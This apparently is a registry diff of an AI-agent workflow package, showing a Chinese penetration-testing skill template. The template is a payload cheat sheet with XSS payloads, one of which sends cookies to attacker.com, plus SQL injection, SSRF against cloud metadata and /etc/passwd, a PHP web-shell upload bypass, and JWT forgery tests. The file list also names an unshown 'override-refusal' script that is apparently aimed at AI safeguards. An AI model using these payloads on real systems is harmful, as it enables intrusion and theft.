ccgx-workflow 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +37 -5
- package/README.zh-CN.md +35 -5
- package/dist/cli.mjs +1 -1
- package/dist/index.mjs +2 -2
- package/dist/shared/{ccgx-workflow.WgUzkiC3.mjs → ccgx-workflow.SJPbUy5_.mjs} +17 -110
- package/package.json +2 -1
- package/templates/commands/agents/phase-runner.md +321 -321
- package/templates/commands/autonomous.md +792 -792
- package/templates/commands/cancel.md +132 -132
- package/templates/commands/debug.md +226 -226
- package/templates/commands/status.md +206 -206
- package/templates/commands/team.md +484 -0
- package/templates/hooks/ccg-session-state.cjs +510 -510
- package/templates/scripts/ccg-phase-runner-launcher.mjs +467 -467
- package/templates/scripts/invoke-model.mjs +64 -0
- package/templates/skills/domains/ai/SKILL.md +35 -35
- package/templates/skills/domains/ai/agent-dev.md +242 -242
- package/templates/skills/domains/ai/llm-security.md +288 -288
- package/templates/skills/domains/ai/rag-system.md +542 -542
- package/templates/skills/domains/architecture/SKILL.md +43 -43
- package/templates/skills/domains/architecture/api-design.md +225 -225
- package/templates/skills/domains/architecture/cloud-native.md +285 -285
- package/templates/skills/domains/architecture/security-arch.md +297 -297
- package/templates/skills/domains/data-engineering/SKILL.md +208 -208
- package/templates/skills/domains/development/SKILL.md +47 -47
- package/templates/skills/domains/development/cpp.md +246 -246
- package/templates/skills/domains/development/go.md +323 -323
- package/templates/skills/domains/development/java.md +277 -277
- package/templates/skills/domains/development/python.md +288 -288
- package/templates/skills/domains/development/rust.md +313 -313
- package/templates/skills/domains/development/shell.md +313 -313
- package/templates/skills/domains/development/typescript.md +277 -277
- package/templates/skills/domains/devops/SKILL.md +40 -40
- package/templates/skills/domains/devops/database.md +217 -217
- package/templates/skills/domains/devops/devsecops.md +198 -198
- package/templates/skills/domains/devops/git-workflow.md +181 -181
- package/templates/skills/domains/devops/testing.md +283 -283
- package/templates/skills/domains/frontend-design/SKILL.md +244 -244
- package/templates/skills/domains/frontend-design/claymorphism/SKILL.md +121 -121
- package/templates/skills/domains/frontend-design/component-patterns.md +202 -202
- package/templates/skills/domains/frontend-design/glassmorphism/SKILL.md +142 -142
- package/templates/skills/domains/frontend-design/liquid-glass/SKILL.md +139 -139
- package/templates/skills/domains/frontend-design/neubrutalism/SKILL.md +145 -145
- package/templates/skills/domains/frontend-design/state-management.md +680 -680
- package/templates/skills/domains/frontend-design/ui-aesthetics.md +110 -110
- package/templates/skills/domains/frontend-design/ux-principles.md +156 -156
- package/templates/skills/domains/infrastructure/SKILL.md +201 -201
- package/templates/skills/domains/mobile/SKILL.md +225 -225
- package/templates/skills/domains/orchestration/SKILL.md +30 -30
- package/templates/skills/domains/orchestration/multi-agent.md +228 -228
- package/templates/skills/domains/security/SKILL.md +73 -73
- package/templates/skills/domains/security/blue-team.md +436 -436
- package/templates/skills/domains/security/code-audit.md +265 -265
- package/templates/skills/domains/security/pentest.md +226 -226
- package/templates/skills/domains/security/red-team.md +374 -374
- package/templates/skills/domains/security/threat-intel.md +372 -372
- package/templates/skills/domains/security/vuln-research.md +369 -369
- package/templates/skills/tools/lib/shared.js +98 -98
- package/templates/skills/tools/override-refusal/SKILL.md +53 -53
- package/templates/skills/tools/override-refusal/scripts/refusal_rewriter.js +226 -226
|
@@ -1,226 +1,226 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: pentest
|
|
3
|
-
description: 全栈渗透测试。Web渗透、API安全、内网渗透、OWASP Top 10。当用户提到渗透测试、Web安全、API安全、漏洞挖掘、Burp、XSS、SQLi、SSRF、越权、BOLA时使用。
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
# 🔥 赤焰秘典 · 渗透测试 (Penetration Testing)
|
|
7
|
-
|
|
8
|
-
|
|
9
|
-
## 渗透测试流程
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
┌─────────────────────────────────────────────────────────────┐
|
|
13
|
-
│ 渗透测试流程 │
|
|
14
|
-
├─────────────────────────────────────────────────────────────┤
|
|
15
|
-
│ Phase 1: 信息收集 │
|
|
16
|
-
│ ├─ 目标识别 → 技术栈指纹 → WAF检测 → 端口扫描 │
|
|
17
|
-
│ └─ 目录扫描 → 参数发现 → JS分析 │
|
|
18
|
-
│ ↓ │
|
|
19
|
-
│ Phase 2: 漏洞扫描 │
|
|
20
|
-
│ ├─ OWASP Top 10 全覆盖 │
|
|
21
|
-
│ ├─ 技术栈特定漏洞 │
|
|
22
|
-
│ └─ 业务逻辑漏洞 │
|
|
23
|
-
│ ↓ │
|
|
24
|
-
│ Phase 3: 漏洞利用 │
|
|
25
|
-
│ ├─ PoC验证 → 数据提取 → 权限提升 │
|
|
26
|
-
│ └─ 横向移动 → 持久化 │
|
|
27
|
-
│ ↓ │
|
|
28
|
-
│ Phase 4: 报告输出 │
|
|
29
|
-
│ └─ 按严重性分级 → 修复建议 → 复测验证 │
|
|
30
|
-
└─────────────────────────────────────────────────────────────┘
|
|
31
|
-
```
|
|
32
|
-
|
|
33
|
-
## OWASP Top 10 测试
|
|
34
|
-
|
|
35
|
-
| 漏洞 | 测试方法 | Payload 示例 |
|
|
36
|
-
|------|----------|--------------|
|
|
37
|
-
| A01 访问控制 | IDOR、越权、JWT伪造 | 替换ID访问他人数据 |
|
|
38
|
-
| A02 加密失败 | HTTPS、敏感数据明文 | 抓包分析 |
|
|
39
|
-
| A03 注入 | SQLi、XSS、CMDi、SSTI | `' OR '1'='1` |
|
|
40
|
-
| A04 不安全设计 | 业务逻辑漏洞 | 流程绕过 |
|
|
41
|
-
| A05 配置错误 | 默认凭证、目录遍历 | `/admin` |
|
|
42
|
-
| A06 脆弱组件 | CVE扫描 | Nuclei模板 |
|
|
43
|
-
| A07 认证失败 | 弱密码、会话固定 | 爆破、重放 |
|
|
44
|
-
| A08 数据完整性 | 反序列化 | 恶意对象 |
|
|
45
|
-
| A09 日志不足 | 敏感信息泄露 | 错误信息 |
|
|
46
|
-
| A10 SSRF | 内网探测 | `http://127.0.0.1` |
|
|
47
|
-
|
|
48
|
-
## Web 渗透测试
|
|
49
|
-
|
|
50
|
-
### XSS Payload
|
|
51
|
-
```html
|
|
52
|
-
<script>alert(1)</script>
|
|
53
|
-
<img src=x onerror=alert(1)>
|
|
54
|
-
<svg/onload=alert(1)>
|
|
55
|
-
javascript:alert(1)
|
|
56
|
-
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
|
|
57
|
-
```
|
|
58
|
-
|
|
59
|
-
### SQL 注入
|
|
60
|
-
```sql
|
|
61
|
-
-- 检测
|
|
62
|
-
' OR '1'='1
|
|
63
|
-
1' AND SLEEP(5)--
|
|
64
|
-
1 UNION SELECT 1,2,3--
|
|
65
|
-
|
|
66
|
-
-- 数据提取
|
|
67
|
-
1 UNION SELECT table_name,2 FROM information_schema.tables--
|
|
68
|
-
1 UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--
|
|
69
|
-
```
|
|
70
|
-
|
|
71
|
-
### SSRF Payload
|
|
72
|
-
```
|
|
73
|
-
http://127.0.0.1:80
|
|
74
|
-
http://169.254.169.254/latest/meta-data/
|
|
75
|
-
file:///etc/passwd
|
|
76
|
-
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0ainfo
|
|
77
|
-
dict://127.0.0.1:6379/info
|
|
78
|
-
```
|
|
79
|
-
|
|
80
|
-
### 文件上传绕过
|
|
81
|
-
```
|
|
82
|
-
shell.php.jpg # 双扩展名
|
|
83
|
-
shell.phtml # 替代扩展名
|
|
84
|
-
shell.php%00.jpg # 空字节截断
|
|
85
|
-
shell.php/. # 路径混淆
|
|
86
|
-
Content-Type: image/jpeg # MIME绕过
|
|
87
|
-
GIF89a<?php system($_GET['cmd']);?> # 文件头绕过
|
|
88
|
-
```
|
|
89
|
-
|
|
90
|
-
## API 安全测试
|
|
91
|
-
|
|
92
|
-
### OWASP API Top 10
|
|
93
|
-
|
|
94
|
-
| 风险 | 描述 | 测试方法 |
|
|
95
|
-
|------|------|----------|
|
|
96
|
-
| API1 BOLA | 对象级授权失效 | 替换ID访问他人数据 |
|
|
97
|
-
| API2 认证失效 | 认证机制缺陷 | 弱Token、无限制 |
|
|
98
|
-
| API3 属性级授权 | 返回过多数据 | 检查响应字段 |
|
|
99
|
-
| API4 资源消耗 | 无速率限制 | 批量请求测试 |
|
|
100
|
-
| API5 BFLA | 功能级授权失效 | 低权限调用高权限API |
|
|
101
|
-
|
|
102
|
-
### BOLA 测试
|
|
103
|
-
```python
|
|
104
|
-
def test_bola(base_url, token):
|
|
105
|
-
"""测试对象级授权漏洞"""
|
|
106
|
-
headers = {"Authorization": f"Bearer {token}"}
|
|
107
|
-
my_id = 100
|
|
108
|
-
|
|
109
|
-
for other_id in [1, 2, 99, 101, 999]:
|
|
110
|
-
resp = requests.get(f"{base_url}/api/users/{other_id}", headers=headers)
|
|
111
|
-
if resp.status_code == 200:
|
|
112
|
-
print(f"[VULN] BOLA: Can access user {other_id}")
|
|
113
|
-
```
|
|
114
|
-
|
|
115
|
-
### JWT 测试
|
|
116
|
-
```python
|
|
117
|
-
import jwt
|
|
118
|
-
|
|
119
|
-
def test_jwt_vulns(token):
|
|
120
|
-
"""JWT 常见漏洞测试"""
|
|
121
|
-
payload = jwt.decode(token, options={"verify_signature": False})
|
|
122
|
-
|
|
123
|
-
# 1. alg=none 绕过
|
|
124
|
-
none_token = jwt.encode(payload, None, algorithm="none")
|
|
125
|
-
|
|
126
|
-
# 2. 弱密钥测试
|
|
127
|
-
weak_secrets = ["secret", "password", "123456", "key"]
|
|
128
|
-
for secret in weak_secrets:
|
|
129
|
-
try:
|
|
130
|
-
jwt.decode(token, secret, algorithms=["HS256"])
|
|
131
|
-
print(f"[VULN] Weak secret: {secret}")
|
|
132
|
-
except: pass
|
|
133
|
-
```
|
|
134
|
-
|
|
135
|
-
### GraphQL 测试
|
|
136
|
-
```graphql
|
|
137
|
-
# 内省查询 - 获取 Schema
|
|
138
|
-
{ __schema { types { name fields { name } } } }
|
|
139
|
-
|
|
140
|
-
# 批量查询攻击
|
|
141
|
-
query {
|
|
142
|
-
user1: user(id: 1) { email }
|
|
143
|
-
user2: user(id: 2) { email }
|
|
144
|
-
}
|
|
145
|
-
|
|
146
|
-
# 深度嵌套 DoS
|
|
147
|
-
{ user(id: 1) { friends { friends { friends { name } } } } }
|
|
148
|
-
```
|
|
149
|
-
|
|
150
|
-
## 技术栈特定测试
|
|
151
|
-
|
|
152
|
-
### Laravel/PHP
|
|
153
|
-
```yaml
|
|
154
|
-
critical_paths:
|
|
155
|
-
- /install # CRITICAL - 安装漏洞
|
|
156
|
-
- /composer.json # HIGH - 依赖泄露
|
|
157
|
-
- /.env # HIGH - 配置泄露
|
|
158
|
-
- /storage/logs # MEDIUM - 日志泄露
|
|
159
|
-
```
|
|
160
|
-
|
|
161
|
-
### Spring Boot
|
|
162
|
-
```yaml
|
|
163
|
-
critical_paths:
|
|
164
|
-
- /actuator/env # CRITICAL - 环境变量
|
|
165
|
-
- /actuator/heapdump # CRITICAL - 内存转储
|
|
166
|
-
- /actuator/mappings # HIGH - 路由泄露
|
|
167
|
-
```
|
|
168
|
-
|
|
169
|
-
### WordPress
|
|
170
|
-
```yaml
|
|
171
|
-
critical_paths:
|
|
172
|
-
- /wp-admin/install.php # CRITICAL - 重装漏洞
|
|
173
|
-
- /wp-config.php.bak # HIGH - 配置备份
|
|
174
|
-
- /xmlrpc.php # MEDIUM - 爆破入口
|
|
175
|
-
```
|
|
176
|
-
|
|
177
|
-
## 常用工具
|
|
178
|
-
|
|
179
|
-
| 工具 | 用途 |
|
|
180
|
-
|------|------|
|
|
181
|
-
| Burp Suite | 代理抓包、漏洞扫描 |
|
|
182
|
-
| sqlmap | SQL注入自动化 |
|
|
183
|
-
| Nuclei | 漏洞模板扫描 |
|
|
184
|
-
| ffuf | 目录/参数爆破 |
|
|
185
|
-
| httpx | 批量探测 |
|
|
186
|
-
| XSStrike | XSS检测 |
|
|
187
|
-
| jwt_tool | JWT测试 |
|
|
188
|
-
| Arjun | 参数发现 |
|
|
189
|
-
|
|
190
|
-
## Burp Suite 技巧
|
|
191
|
-
|
|
192
|
-
```
|
|
193
|
-
# Intruder 爆破
|
|
194
|
-
Payload: 字典/数字范围
|
|
195
|
-
Position: 标记参数 §param§
|
|
196
|
-
|
|
197
|
-
# Repeater 手动测试
|
|
198
|
-
修改参数 → 发送 → 分析响应
|
|
199
|
-
|
|
200
|
-
# 插件推荐
|
|
201
|
-
- HaE (高亮敏感信息)
|
|
202
|
-
- Autorize (越权检测)
|
|
203
|
-
- JSON Beautifier
|
|
204
|
-
```
|
|
205
|
-
|
|
206
|
-
## 报告格式
|
|
207
|
-
|
|
208
|
-
```markdown
|
|
209
|
-
# 渗透测试报告
|
|
210
|
-
|
|
211
|
-
## 🔴 CRITICAL
|
|
212
|
-
### 1. SQL注入 - /api/users
|
|
213
|
-
- **位置**: id 参数
|
|
214
|
-
- **PoC**: `id=1' AND SLEEP(5)--`
|
|
215
|
-
- **影响**: 数据库完全泄露
|
|
216
|
-
- **修复**: 使用参数化查询
|
|
217
|
-
|
|
218
|
-
## 🟠 HIGH
|
|
219
|
-
...
|
|
220
|
-
|
|
221
|
-
## 🟡 MEDIUM
|
|
222
|
-
...
|
|
223
|
-
```
|
|
224
|
-
|
|
225
|
-
---
|
|
226
|
-
|
|
1
|
+
---
|
|
2
|
+
name: pentest
|
|
3
|
+
description: 全栈渗透测试。Web渗透、API安全、内网渗透、OWASP Top 10。当用户提到渗透测试、Web安全、API安全、漏洞挖掘、Burp、XSS、SQLi、SSRF、越权、BOLA时使用。
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# 🔥 赤焰秘典 · 渗透测试 (Penetration Testing)
|
|
7
|
+
|
|
8
|
+
|
|
9
|
+
## 渗透测试流程
|
|
10
|
+
|
|
11
|
+
```
|
|
12
|
+
┌─────────────────────────────────────────────────────────────┐
|
|
13
|
+
│ 渗透测试流程 │
|
|
14
|
+
├─────────────────────────────────────────────────────────────┤
|
|
15
|
+
│ Phase 1: 信息收集 │
|
|
16
|
+
│ ├─ 目标识别 → 技术栈指纹 → WAF检测 → 端口扫描 │
|
|
17
|
+
│ └─ 目录扫描 → 参数发现 → JS分析 │
|
|
18
|
+
│ ↓ │
|
|
19
|
+
│ Phase 2: 漏洞扫描 │
|
|
20
|
+
│ ├─ OWASP Top 10 全覆盖 │
|
|
21
|
+
│ ├─ 技术栈特定漏洞 │
|
|
22
|
+
│ └─ 业务逻辑漏洞 │
|
|
23
|
+
│ ↓ │
|
|
24
|
+
│ Phase 3: 漏洞利用 │
|
|
25
|
+
│ ├─ PoC验证 → 数据提取 → 权限提升 │
|
|
26
|
+
│ └─ 横向移动 → 持久化 │
|
|
27
|
+
│ ↓ │
|
|
28
|
+
│ Phase 4: 报告输出 │
|
|
29
|
+
│ └─ 按严重性分级 → 修复建议 → 复测验证 │
|
|
30
|
+
└─────────────────────────────────────────────────────────────┘
|
|
31
|
+
```
|
|
32
|
+
|
|
33
|
+
## OWASP Top 10 测试
|
|
34
|
+
|
|
35
|
+
| 漏洞 | 测试方法 | Payload 示例 |
|
|
36
|
+
|------|----------|--------------|
|
|
37
|
+
| A01 访问控制 | IDOR、越权、JWT伪造 | 替换ID访问他人数据 |
|
|
38
|
+
| A02 加密失败 | HTTPS、敏感数据明文 | 抓包分析 |
|
|
39
|
+
| A03 注入 | SQLi、XSS、CMDi、SSTI | `' OR '1'='1` |
|
|
40
|
+
| A04 不安全设计 | 业务逻辑漏洞 | 流程绕过 |
|
|
41
|
+
| A05 配置错误 | 默认凭证、目录遍历 | `/admin` |
|
|
42
|
+
| A06 脆弱组件 | CVE扫描 | Nuclei模板 |
|
|
43
|
+
| A07 认证失败 | 弱密码、会话固定 | 爆破、重放 |
|
|
44
|
+
| A08 数据完整性 | 反序列化 | 恶意对象 |
|
|
45
|
+
| A09 日志不足 | 敏感信息泄露 | 错误信息 |
|
|
46
|
+
| A10 SSRF | 内网探测 | `http://127.0.0.1` |
|
|
47
|
+
|
|
48
|
+
## Web 渗透测试
|
|
49
|
+
|
|
50
|
+
### XSS Payload
|
|
51
|
+
```html
|
|
52
|
+
<script>alert(1)</script>
|
|
53
|
+
<img src=x onerror=alert(1)>
|
|
54
|
+
<svg/onload=alert(1)>
|
|
55
|
+
javascript:alert(1)
|
|
56
|
+
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
|
|
57
|
+
```
|
|
58
|
+
|
|
59
|
+
### SQL 注入
|
|
60
|
+
```sql
|
|
61
|
+
-- 检测
|
|
62
|
+
' OR '1'='1
|
|
63
|
+
1' AND SLEEP(5)--
|
|
64
|
+
1 UNION SELECT 1,2,3--
|
|
65
|
+
|
|
66
|
+
-- 数据提取
|
|
67
|
+
1 UNION SELECT table_name,2 FROM information_schema.tables--
|
|
68
|
+
1 UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--
|
|
69
|
+
```
|
|
70
|
+
|
|
71
|
+
### SSRF Payload
|
|
72
|
+
```
|
|
73
|
+
http://127.0.0.1:80
|
|
74
|
+
http://169.254.169.254/latest/meta-data/
|
|
75
|
+
file:///etc/passwd
|
|
76
|
+
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0ainfo
|
|
77
|
+
dict://127.0.0.1:6379/info
|
|
78
|
+
```
|
|
79
|
+
|
|
80
|
+
### 文件上传绕过
|
|
81
|
+
```
|
|
82
|
+
shell.php.jpg # 双扩展名
|
|
83
|
+
shell.phtml # 替代扩展名
|
|
84
|
+
shell.php%00.jpg # 空字节截断
|
|
85
|
+
shell.php/. # 路径混淆
|
|
86
|
+
Content-Type: image/jpeg # MIME绕过
|
|
87
|
+
GIF89a<?php system($_GET['cmd']);?> # 文件头绕过
|
|
88
|
+
```
|
|
89
|
+
|
|
90
|
+
## API 安全测试
|
|
91
|
+
|
|
92
|
+
### OWASP API Top 10
|
|
93
|
+
|
|
94
|
+
| 风险 | 描述 | 测试方法 |
|
|
95
|
+
|------|------|----------|
|
|
96
|
+
| API1 BOLA | 对象级授权失效 | 替换ID访问他人数据 |
|
|
97
|
+
| API2 认证失效 | 认证机制缺陷 | 弱Token、无限制 |
|
|
98
|
+
| API3 属性级授权 | 返回过多数据 | 检查响应字段 |
|
|
99
|
+
| API4 资源消耗 | 无速率限制 | 批量请求测试 |
|
|
100
|
+
| API5 BFLA | 功能级授权失效 | 低权限调用高权限API |
|
|
101
|
+
|
|
102
|
+
### BOLA 测试
|
|
103
|
+
```python
|
|
104
|
+
def test_bola(base_url, token):
|
|
105
|
+
"""测试对象级授权漏洞"""
|
|
106
|
+
headers = {"Authorization": f"Bearer {token}"}
|
|
107
|
+
my_id = 100
|
|
108
|
+
|
|
109
|
+
for other_id in [1, 2, 99, 101, 999]:
|
|
110
|
+
resp = requests.get(f"{base_url}/api/users/{other_id}", headers=headers)
|
|
111
|
+
if resp.status_code == 200:
|
|
112
|
+
print(f"[VULN] BOLA: Can access user {other_id}")
|
|
113
|
+
```
|
|
114
|
+
|
|
115
|
+
### JWT 测试
|
|
116
|
+
```python
|
|
117
|
+
import jwt
|
|
118
|
+
|
|
119
|
+
def test_jwt_vulns(token):
|
|
120
|
+
"""JWT 常见漏洞测试"""
|
|
121
|
+
payload = jwt.decode(token, options={"verify_signature": False})
|
|
122
|
+
|
|
123
|
+
# 1. alg=none 绕过
|
|
124
|
+
none_token = jwt.encode(payload, None, algorithm="none")
|
|
125
|
+
|
|
126
|
+
# 2. 弱密钥测试
|
|
127
|
+
weak_secrets = ["secret", "password", "123456", "key"]
|
|
128
|
+
for secret in weak_secrets:
|
|
129
|
+
try:
|
|
130
|
+
jwt.decode(token, secret, algorithms=["HS256"])
|
|
131
|
+
print(f"[VULN] Weak secret: {secret}")
|
|
132
|
+
except: pass
|
|
133
|
+
```
|
|
134
|
+
|
|
135
|
+
### GraphQL 测试
|
|
136
|
+
```graphql
|
|
137
|
+
# 内省查询 - 获取 Schema
|
|
138
|
+
{ __schema { types { name fields { name } } } }
|
|
139
|
+
|
|
140
|
+
# 批量查询攻击
|
|
141
|
+
query {
|
|
142
|
+
user1: user(id: 1) { email }
|
|
143
|
+
user2: user(id: 2) { email }
|
|
144
|
+
}
|
|
145
|
+
|
|
146
|
+
# 深度嵌套 DoS
|
|
147
|
+
{ user(id: 1) { friends { friends { friends { name } } } } }
|
|
148
|
+
```
|
|
149
|
+
|
|
150
|
+
## 技术栈特定测试
|
|
151
|
+
|
|
152
|
+
### Laravel/PHP
|
|
153
|
+
```yaml
|
|
154
|
+
critical_paths:
|
|
155
|
+
- /install # CRITICAL - 安装漏洞
|
|
156
|
+
- /composer.json # HIGH - 依赖泄露
|
|
157
|
+
- /.env # HIGH - 配置泄露
|
|
158
|
+
- /storage/logs # MEDIUM - 日志泄露
|
|
159
|
+
```
|
|
160
|
+
|
|
161
|
+
### Spring Boot
|
|
162
|
+
```yaml
|
|
163
|
+
critical_paths:
|
|
164
|
+
- /actuator/env # CRITICAL - 环境变量
|
|
165
|
+
- /actuator/heapdump # CRITICAL - 内存转储
|
|
166
|
+
- /actuator/mappings # HIGH - 路由泄露
|
|
167
|
+
```
|
|
168
|
+
|
|
169
|
+
### WordPress
|
|
170
|
+
```yaml
|
|
171
|
+
critical_paths:
|
|
172
|
+
- /wp-admin/install.php # CRITICAL - 重装漏洞
|
|
173
|
+
- /wp-config.php.bak # HIGH - 配置备份
|
|
174
|
+
- /xmlrpc.php # MEDIUM - 爆破入口
|
|
175
|
+
```
|
|
176
|
+
|
|
177
|
+
## 常用工具
|
|
178
|
+
|
|
179
|
+
| 工具 | 用途 |
|
|
180
|
+
|------|------|
|
|
181
|
+
| Burp Suite | 代理抓包、漏洞扫描 |
|
|
182
|
+
| sqlmap | SQL注入自动化 |
|
|
183
|
+
| Nuclei | 漏洞模板扫描 |
|
|
184
|
+
| ffuf | 目录/参数爆破 |
|
|
185
|
+
| httpx | 批量探测 |
|
|
186
|
+
| XSStrike | XSS检测 |
|
|
187
|
+
| jwt_tool | JWT测试 |
|
|
188
|
+
| Arjun | 参数发现 |
|
|
189
|
+
|
|
190
|
+
## Burp Suite 技巧
|
|
191
|
+
|
|
192
|
+
```
|
|
193
|
+
# Intruder 爆破
|
|
194
|
+
Payload: 字典/数字范围
|
|
195
|
+
Position: 标记参数 §param§
|
|
196
|
+
|
|
197
|
+
# Repeater 手动测试
|
|
198
|
+
修改参数 → 发送 → 分析响应
|
|
199
|
+
|
|
200
|
+
# 插件推荐
|
|
201
|
+
- HaE (高亮敏感信息)
|
|
202
|
+
- Autorize (越权检测)
|
|
203
|
+
- JSON Beautifier
|
|
204
|
+
```
|
|
205
|
+
|
|
206
|
+
## 报告格式
|
|
207
|
+
|
|
208
|
+
```markdown
|
|
209
|
+
# 渗透测试报告
|
|
210
|
+
|
|
211
|
+
## 🔴 CRITICAL
|
|
212
|
+
### 1. SQL注入 - /api/users
|
|
213
|
+
- **位置**: id 参数
|
|
214
|
+
- **PoC**: `id=1' AND SLEEP(5)--`
|
|
215
|
+
- **影响**: 数据库完全泄露
|
|
216
|
+
- **修复**: 使用参数化查询
|
|
217
|
+
|
|
218
|
+
## 🟠 HIGH
|
|
219
|
+
...
|
|
220
|
+
|
|
221
|
+
## 🟡 MEDIUM
|
|
222
|
+
...
|
|
223
|
+
```
|
|
224
|
+
|
|
225
|
+
---
|
|
226
|
+
|